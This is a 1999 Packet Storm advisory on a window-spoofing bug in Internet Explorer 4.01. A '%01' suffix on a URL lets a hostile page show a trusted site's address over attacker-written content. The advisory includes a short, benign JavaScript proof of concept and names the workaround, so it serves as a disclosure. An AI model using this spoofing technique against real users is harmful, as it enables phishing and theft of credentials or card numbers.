msie4.01-window-spoof.txt

1999-08-17T00:00:00
ID PACKETSTORM:12355
Type packetstorm
Reporter Georgi Guninski
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Guninski's IE 4 window spoofing.  
http://www.geocities.com/ResearchTriangle/1711/read4.html  
  
There is a bug in Internet Explorer 4.01 (patched) which allows "window spoofing".  
  
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.  
  
This circumvents "Cross-frame security" and opens several security holes.  
  
After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site.  
However, the content of the window is not that of the original site, but it is supplied by the owner of the page.  
So, the user is mislead he is browising a trusted site,   
while he is browsing a hostile page and may provide sensitive information, such as credit card number.  
  
The bug may be exploited using HTML mail message. The exploit uses Javascript.   
  
Workaround: Disable Javascript.  
  
Written by http://www.geocities.com/ResearchTriangle/1711 - Georgi Guninski  
  
  
Exploit code  
------------  
<SCRIPT>  
  
alert('A window will be open. Examine the location and the content.\nThis may also be done by clicking a link.')  
b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look at the address bar!<BR>');a.document.write('<A HREF=\"http://www.geocities.com/ResearchTriangle/1711\">Go to Georgi Guninski\\'s home page</A></H1></BODY></HTML>');close()</"+"SCRIPT>%01http://www.yahoo.com");  
  
</SCRIPT>  
`